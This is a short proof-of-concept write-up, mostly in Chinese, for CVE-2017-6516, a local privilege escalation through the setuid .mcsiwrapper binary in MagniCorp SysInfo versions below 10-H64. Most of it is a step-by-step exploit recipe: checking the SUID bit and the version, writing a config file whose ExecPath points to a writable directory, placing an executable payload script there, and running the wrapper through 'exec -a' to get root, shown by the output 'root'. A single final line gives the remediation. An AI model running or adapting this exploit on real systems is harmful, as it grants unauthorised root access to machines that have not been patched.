
A PoC / methodology to exploit CVE-2017-6516
CVE-2017-6516 是一个提权漏洞,针对 MagniCorp SysInfo 版本低于 10-H64 的 .mcsiwrapper 二进制文件。当此二进制文件的 SUID 位被设置且版本过旧时,用户可以以该二进制文件的所有者(通常为 root)身份执行任意代码。
.mcsiwrapper 必须设置 setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper 必须低于版本 10-H64:$ .mcsiwrapper --version
<Version under 10-H64>
创建一个名为 config 的文件,内容如下:
ExecPath=<Path to a writeable directory>
在 ExecPath 目录中创建一个可执行的 payload 文件,例如:
#!/bin/sh
whoami
并使其可执行:
$ chmod +x payload
运行命令:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
将 .mcsiwrapper 更新到至少 10-H64 版本。